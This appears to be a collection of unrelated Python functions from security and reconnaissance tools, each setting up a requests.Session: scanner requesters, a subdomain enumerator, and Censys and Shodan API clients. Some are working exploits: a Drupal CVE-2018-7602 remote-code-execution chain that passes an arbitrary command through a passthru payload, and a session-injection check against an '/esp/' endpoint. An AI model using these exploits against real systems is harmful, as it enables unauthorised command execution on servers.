def __init__(self, url="", cookies={}, headers={}, args={}, proxy={}): ''' @params url: 目标url cookie: 自定义cookie,字符串类型 headers: http headers, 字典类型 args: 其他参数, 字典类型 ''' self.url = url.strip() if self.url: formated = URL.format(self.url) self.protocol = formated.protocol self.uri = formated.uri self.host = formated.host self.path = formated.path self.baseURL = formated.baseURL self.params = formated.params else: self.uri, self.host, self.path, self.baseURL, self.params = "", "", "", "", "" self.args = args self.http = requests.Session() if cookies: for key, value in cookies.iteritems(): self.http.cookies.set(key, value) if headers: self.http.headers.update(headers) if proxy: self.http.proxies = proxy self.register()
def setup(self): ''' To improve dirsearch performance, we resolve the hostname before scanning and then send requests by IP instead of hostname, so the library won't have to resolve it before every request. This also keeps the scan stable despite any issue with the system DNS resolver (running tools like Amass might cause such things). If you don't like it, you can disable it with `-b` command-line flag Note: A proxy could have a different DNS that would resolve the name. ThereFore. resolving the name when using proxy to raise an error is pointless ''' if not self.request_by_hostname and not self.proxy and not self.proxylist: try: self.ip = self.ip or socket.gethostbyname(self.host) except socket.gaierror: # Check if hostname resolves to IPv6 address only try: self.ip = socket.getaddrinfo(self.host, None, socket.AF_INET6)[0][4][0] except socket.gaierror: raise RequestException("Couldn't resolve DNS") self.url = "{0}://{1}:{2}/".format( self.scheme, self.ip, self.port, ) self.session = requests.Session() self.set_adapter()
def __init__(self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True): subdomains = subdomains or [] self.domain = urlparse.urlparse(domain).netloc self.session = requests.Session() self.subdomains = [] self.timeout = 25 self.base_url = base_url self.engine_name = engine_name self.silent = silent self.verbose = verbose self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.8', 'Accept-Encoding': 'gzip', } self.print_banner()
def __init__(self): self.maximum = 1000 self.pmax = 50 self.sreq = requests.Session() self.sreq.headers['User-Agent'] = random_user_agent() super(Baidu, self).__init__(_NAME, _SITE, _DESC)
def __init__(self, url, cookie=None, useragent=None, maxPool=1, maxRetries=5, delay=0, timeout=30, ip=None, proxy=None, redirect=False, requestByHostname=False): # if no backslash, append one if not url.endswith('/'): url = url + '/' parsed = urllib.parse.urlparse(url) self.basePath = parsed.path # if not protocol specified, set http by default if parsed.scheme != 'http' and parsed.scheme != 'https': parsed = urllib.parse.urlparse('http://' + url) self.basePath = parsed.path self.protocol = parsed.scheme if self.protocol != 'http' and self.protocol != 'https': self.protocol = 'http' self.host = parsed.netloc.split(':')[0] # resolve DNS to decrease overhead if ip is not None: self.ip = ip else: try: self.ip = socket.gethostbyname(self.host) except socket.gaierror: raise RequestException({'message': "Couldn't resolve DNS"}) self.headers['Host'] = self.host # If no port specified, set default (80, 443) try: self.port = parsed.netloc.split(':')[1] except IndexError: self.port = (443 if self.protocol == 'https' else 80) # Set cookie and user-agent headers if cookie is not None: self.setHeader('Cookie', cookie) if useragent is not None: self.setHeader('User-agent', useragent) self.maxRetries = maxRetries self.maxPool = maxPool self.delay = delay self.timeout = timeout self.pool = None self.proxy = proxy self.redirect = redirect self.randomAgents = None self.requestByHostname = requestByHostname self.session = requests.Session()
def _request(self, uri, headers=None, data=None): if self.requester is None: self.requester = requests.Session() self.requester.headers.update(self.headers) response = None if data is None: response = self.requester.get(uri, headers=headers) else: response = self.requester.get(uri, headers=headers, data=data) return response.content
def request(self, method='GET', url='', *args, **kwargs): s = requests.Session() s.headers.update({ 'User-Agent': ('Mozilla/5.0 (Windows NT 6.1; WOW64) ' 'AppleWebKit/537.36 (KHTML, like Gecko)' 'Chrome/37.0.2062.124 Safari/537.36') }) s.verify = self.verify kwargs['timeout'] = self.timeout if self.proxy_list: proxy = random.choice(self.proxy_list) s.proxies = proxy req = s.request(method, url, *args, **kwargs) return req
def requests_retry_session(self): session = requests.Session() retryCount = int(self.retryMaxCount) retryBackOff = float(self.retryBackOff) statusCodes = list(map(int, self.retryErrorCodes.split(','))) print(list(statusCodes)); retry = Retry( total=retryCount, read=retryCount, connect=retryCount, backoff_factor = retryBackOff, status_forcelist=statusCodes, ) adapter = HTTPAdapter(max_retries=retry) session.mount('http://', adapter) session.mount('https://', adapter) return session
def __init__(self, api_id=None, api_secret=None, url=None, timeout=None, user_agent_identifier=None): self.api_id = api_id or os.environ.get("CENSYS_API_ID", None) self.api_secret = api_secret or os.environ.get("CENSYS_API_SECRET", None) if not self.api_id or not self.api_secret: raise CensysException(401, "No API ID or API secret configured.") timeout = timeout or self.DEFAULT_TIMEOUT self._api_url = url or os.environ.get("CENSYS_API_URL", None) or self.DEFAULT_URL # create a session that we'll use for making requests self._session = requests.Session() self._session.auth = (self.api_id, self.api_secret) self._session.timeout = timeout self._session.headers.update({ "accept": "application/json, */8", "User-Agent": ' '.join( [requests.utils.default_user_agent(), user_agent_identifier or self.DEFAULT_USER_AGENT]) }) # test that everything works by requesting the users account information self.account()
def sacn(target): try: r = requests.Session().get(str(target), headers=header, timeout=TimeOut) status = r.status_code title = re.search(r'<title>(.*)</title>', r.text) #get the title if title: title = title.group(1).strip().strip("\r").strip("\n")[:30] else: title = "None" banner = '' try: banner += r.headers['Server'][:20] #get the server banner except: pass return "Status>%s|Server>%s|Title>%s" % (status, banner, title) except Exception, e: pass
def __init__(self, url="", cookie="", headers={}, elseArgs={}): self.url = url.strip() if self.url: formated = URL.format(self.url) self.uri = formated.uri self.host = formated.host self.path = formated.path self.baseURL = formated.baseURL self.params = formated.params else: self.uri, self.host, self.path, self.baseURL, self.params = "", "", "", "", "" self.elseArgs = elseArgs cookie = cookie.strip() self.http = requests.Session() if cookie: for item in _strCookie2Dict(cookie): self.http.cookies.set(item['name'], item['value']) self.http.headers.update(headers) self.register()
def exploit(target, headers=None): log.process("Requesting target site:" + target) create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format( target) verify_url = '{}/php/utils/debug.php'.format(target) session = requests.Session() if 'https' in target: session.get(verify_url, verify=False) session.get(create_session_url, verify=False) verify = session.get(verify_url, verify=False) else: session.get(verify_url) session.get(create_session_url) verify = session.get(verify_url) if 'Debug Console' in verify.text: res = '{} is vul'.format(target) else: res = '{} is not vul'.format(target) return res
def __init__(self, key, proxies=None): """Initializes the API object. :param key: The Shodan API key. :type key: str :param proxies: A proxies array for the requests library, e.g. {'https': 'your proxy'} :type proxies: dict """ self.api_key = key self.base_url = 'https://api.shodan.io' self.base_exploits_url = 'https://exploits.shodan.io' self.data = self.Data(self) self.dns = self.Dns(self) self.exploits = self.Exploits(self) self.labs = self.Labs(self) self.notifier = self.Notifier(self) self.org = self.Organization(self) self.tools = self.Tools(self) self.stream = Stream(key, proxies=proxies) self._session = requests.Session() if proxies: self._session.proxies.update(proxies) self._session.trust_env = False
def cve_2018_7602_exp(self, cmd): vul_name = "Drupal: CVE-2018-7602" DRUPAL_U = "admin" DRUPAL_P = "admin" try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore') verify.exploit_print(self.r.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def __init__(self, url, script_path, cookie=None, useragent=None, maxPool=1, maxRetries=5, delay=0, timeout=30, ip=None, proxy=None, redirect=False, requestByHostname=False, httpmethod="get"): self.httpmethod = httpmethod self.script_path = script_path # if no backslash, append one # if not url.endswith('/'): # url = url + '/' # http://hostname.local add slash if urllib.parse.urlparse(url).path == '': url = url + '/' parsed = urllib.parse.urlparse(url) self.basePath = parsed.path url_type, suffix, directory_name, filename, base_path = self.getURLTypeAndSuffix( self.basePath) self.url_type = url_type self.extension = suffix self.directory = directory_name self.filename = filename if base_path: self.base_path = base_path else: self.base_path = '/' if self.extension: self.site_fingerprint = set([self.extension]) else: self.site_fingerprint = set([]) if self.url_type == URLType.normal_file: self.scan_dict = Dict4URLType.normal_file elif self.url_type == URLType.normal_restful_dir: self.scan_dict = Dict4URLType.normal_restful_dir elif self.url_type == URLType.restful_file: self.scan_dict = Dict4URLType.restful_file # if not protocol specified, set http by default if parsed.scheme != 'http' and parsed.scheme != 'https': parsed = urllib.parse.urlparse('http://' + url) self.basePath = parsed.path self.protocol = parsed.scheme if self.protocol != 'http' and self.protocol != 'https': self.protocol = 'http' self.host = parsed.netloc.split(':')[0] # resolve DNS to decrease overhead if ip is not None: self.ip = ip else: try: self.ip = socket.gethostbyname(self.host) except socket.gaierror: raise RequestException({'message': "Couldn't resolve DNS"}) self.headers['Host'] = self.host # If no port specified, set default (80, 443) try: self.port = parsed.netloc.split(':')[1] except IndexError: self.port = (443 if self.protocol == 'https' else 80) # Set cookie and user-agent headers if cookie is not None: self.setHeader('Cookie', cookie) if useragent is not None: self.setHeader('User-agent', useragent) self.maxRetries = maxRetries self.maxPool = maxPool self.delay = delay self.timeout = timeout self.pool = None self.proxy = proxy self.redirect = redirect self.randomAgents = None self.requestByHostname = requestByHostname self.session = requests.Session()
def __init__(self, file_url, session=None): self.session = session or requests.Session() requested_file = self._request_for_file(file_url) self.len = int(requested_file.headers['content-length']) self.raw_data = requested_file.raw
def __init__( self, url, cookie=None, useragent=None, maxPool=1, maxRetries=5, delay=0, timeout=30, ip=None, proxy=None, proxylist=None, redirect=False, requestByHostname=False, httpmethod="get", ): self.httpmethod = httpmethod # if no backslash, append one if not url.endswith("/"): url += "/" parsed = urllib.parse.urlparse(url) self.basePath = parsed.path # if not protocol specified, set http by default if parsed.scheme not in ["https", "http"]: parsed = urllib.parse.urlparse("http://" + url) self.basePath = parsed.path self.protocol = parsed.scheme if self.protocol not in ["https", "http"]: self.protocol = "http" self.host = parsed.netloc.split(":")[0] # resolve DNS to decrease overhead if ip is not None: self.ip = ip else: try: self.ip = socket.gethostbyname(self.host) except socket.gaierror: raise RequestException({"message": "Couldn't resolve DNS"}) self.headers["Host"] = self.host # If no port specified, set default (80, 443) try: self.port = parsed.netloc.split(":")[1] except IndexError: self.port = 443 if self.protocol == "https" else 80 # Set cookie and user-agent headers if cookie is not None: self.setHeader("Cookie", cookie) if useragent is not None: self.setHeader("User-agent", useragent) self.maxRetries = maxRetries self.maxPool = maxPool self.delay = delay self.timeout = timeout self.pool = None self.proxy = proxy self.proxylist = proxylist self.redirect = redirect self.randomAgents = None self.requestByHostname = requestByHostname self.session = requests.Session()
def __init__( self, url, cookie=None, useragent=None, maxPool=1, maxRetries=5, delay=0, timeout=20, ip=None, proxy=None, proxylist=None, redirect=False, requestByHostname=False, httpmethod="get", data=None, ): self.httpmethod = httpmethod self.data = data # if no backslash, append one if not url.endswith("/"): url += "/" parsed = urllib.parse.urlparse(url) self.basePath = parsed.path.lstrip("/") # If no protocol specified, set http by default if not parsed.scheme: parsed = urllib.parse.urlparse("http://" + url) # If protocol is not supported elif parsed.scheme not in ["https", "http"]: raise RequestException({"message": "Unsupported URL scheme: {0}".format(parsed.scheme)}) self.basePath = parsed.path self.protocol = parsed.scheme self.host = parsed.netloc.split(":")[0] # resolve DNS to decrease overhead if ip: self.ip = ip else: try: self.ip = socket.gethostbyname(self.host) except socket.gaierror: raise RequestException({"message": "Couldn't resolve DNS"}) # If no port specified, set default (80, 443) try: self.port = int(parsed.netloc.split(":")[1]) except IndexError: self.port = 443 if self.protocol == "https" else 80 except ValueError: raise RequestException( {"message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1])} ) # Pass if the host header has already been set if "host" not in [hd.lower() for hd in self.headers]: self.headers["Host"] = self.host # Include port in Host header if it's non-standard if (self.protocol == "https" and self.port != 443) or ( self.protocol == "http" and self.port != 80 ): self.headers["Host"] += ":{0}".format(self.port) # Set cookie and user-agent headers if cookie: self.setHeader("Cookie", cookie) if useragent: self.setHeader("User-agent", useragent) self.maxRetries = maxRetries self.maxPool = maxPool self.delay = delay self.timeout = timeout self.pool = None self.proxy = proxy self.proxylist = proxylist self.redirect = redirect self.randomAgents = None self.requestByHostname = requestByHostname self.session = requests.Session() self.url = "{0}://{1}:{2}".format(self.protocol, self.host if self.requestByHostname else self.ip, self.port)
def __init__( self, url, max_pool=1, max_retries=5, timeout=20, ip=None, proxy=None, proxylist=None, redirect=False, request_by_hostname=False, httpmethod="get", data=None, scheme=None, ): self.httpmethod = httpmethod self.data = data self.headers = {} parsed = urlparse(url) # If no protocol specified, set http by default if "://" not in url: parsed = urlparse("{0}://{1}".format(scheme, url)) # If protocol is not supported elif parsed.scheme not in ["https", "http"]: raise RequestException({ "message": "Unsupported URL scheme: {0}".format(parsed.scheme) }) self.base_path = parsed.path if parsed.path.startswith("/"): self.base_path = parsed.path[1:] # Safe quote all special characters in base_path to prevent from being encoded self.base_path = safequote(self.base_path) self.protocol = parsed.scheme self.host = parsed.netloc.split(":")[0] # Resolve DNS to decrease overhead if ip: self.ip = ip # A proxy could have a different DNS that would resolve the name. ThereFore. # resolving the name when using proxy to raise an error is pointless elif not proxy and not proxylist: try: self.ip = socket.gethostbyname(self.host) except socket.gaierror: # Check if hostname resolves to IPv6 address only try: self.ip = socket.getaddrinfo(self.host, None, socket.AF_INET6)[0][4][0] except socket.gaierror: raise RequestException({"message": "Couldn't resolve DNS"}) # If no port specified, set default (80, 443) try: self.port = int(parsed.netloc.split(":")[1]) except IndexError: self.port = 443 if self.protocol == "https" else 80 except ValueError: raise RequestException({ "message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1]) }) # Set the Host header, this will be overwritten if the user has already set the header self.headers["Host"] = self.host # Include port in Host header if it's non-standard if (self.protocol == "https" and self.port != 443) or (self.protocol == "http" and self.port != 80): self.headers["Host"] += ":{0}".format(self.port) self.max_retries = max_retries self.max_pool = max_pool self.timeout = timeout self.pool = None self.proxy = proxy self.proxylist = proxylist self.redirect = redirect self.random_agents = None self.auth = None self.request_by_hostname = request_by_hostname self.session = requests.Session() self.url = "{0}://{1}:{2}/".format( self.protocol, self.host if self.request_by_hostname else self.ip, self.port, ) self.base_url = "{0}://{1}:{2}/".format( self.protocol, self.host, self.port, ) self.set_adapter()
def __init__(self, verbose=False, session=None): self.verbose = verbose if not session: self.session = requests.Session() else: self.session = session
def __init__( self, url, maxPool=1, maxRetries=5, timeout=20, ip=None, proxy=None, proxylist=None, redirect=False, requestByHostname=False, httpmethod="get", data=None, scheme=None, ): self.httpmethod = httpmethod self.data = data self.headers = {} # If no backslash, append one if not url.endswith("/"): url += "/" parsed = urllib.parse.urlparse(url) # If no protocol specified, set http by default if "://" not in url: parsed = urllib.parse.urlparse("{0}://{1}".format(scheme, url)) # If protocol is not supported elif parsed.scheme not in ["https", "http"]: raise RequestException({"message": "Unsupported URL scheme: {0}".format(parsed.scheme)}) if parsed.path.startswith("/"): self.basePath = parsed.path[1:] else: self.basePath = parsed.path # Safe quote all special characters in basePath to prevent from being encoded when performing requests self.basePath = urllib.parse.quote(self.basePath, safe="!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~") self.protocol = parsed.scheme self.host = parsed.netloc.split(":")[0] # Resolve DNS to decrease overhead if ip: self.ip = ip # A proxy could have a different DNS that would resolve the name. Therefore, # resolving the name when using proxy to raise an error is pointless elif not proxy and not proxylist: try: self.ip = socket.gethostbyname(self.host) except socket.gaierror: raise RequestException({"message": "Couldn't resolve DNS"}) # If no port specified, set default (80, 443) try: self.port = int(parsed.netloc.split(":")[1]) except IndexError: self.port = 443 if self.protocol == "https" else 80 except ValueError: raise RequestException( {"message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1])} ) # Set the Host header, this will be overwritten if the user has already set the header self.headers["Host"] = self.host # Include port in Host header if it's non-standard if (self.protocol == "https" and self.port != 443) or ( self.protocol == "http" and self.port != 80 ): self.headers["Host"] += ":{0}".format(self.port) self.maxRetries = maxRetries self.maxPool = maxPool self.timeout = timeout self.pool = None self.proxy = proxy self.proxylist = proxylist self.redirect = redirect self.randomAgents = None self.requestByHostname = requestByHostname self.session = requests.Session() self.url = "{0}://{1}:{2}/".format( self.protocol, self.host if self.requestByHostname else self.ip, self.port, )
def cve_2018_7602_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2018-7602" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Drupal drupalgeddon2 remote code execution" self.vul_info["vul_numb"] = "CVE-2018-7602" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2018-06-19" self.vul_info["vul_vers"] = "< 7.59, < 8.5.3" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \ "攻击者可以通过不同方式利用该漏洞远程执行代码。" \ "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" DRUPAL_U = "admin" DRUPAL_P = "admin" md = random_md5() cmd = "echo " + md try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(self.r.text, md): self.vul_info["vul_data"] = dump.dump_all(self.r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" else: self.request = requests.get(self.url + "/CHANGELOG.txt", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.rawdata = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])", self.request.text) if self.request.status_code == 200 and r"Drupal" in self.request.text: if '7.59' not in self.allver and '8.5.3' not in self.allver: self.vul_info["vul_data"] = dump.dump_all( self.r).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd self.vul_info[ "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()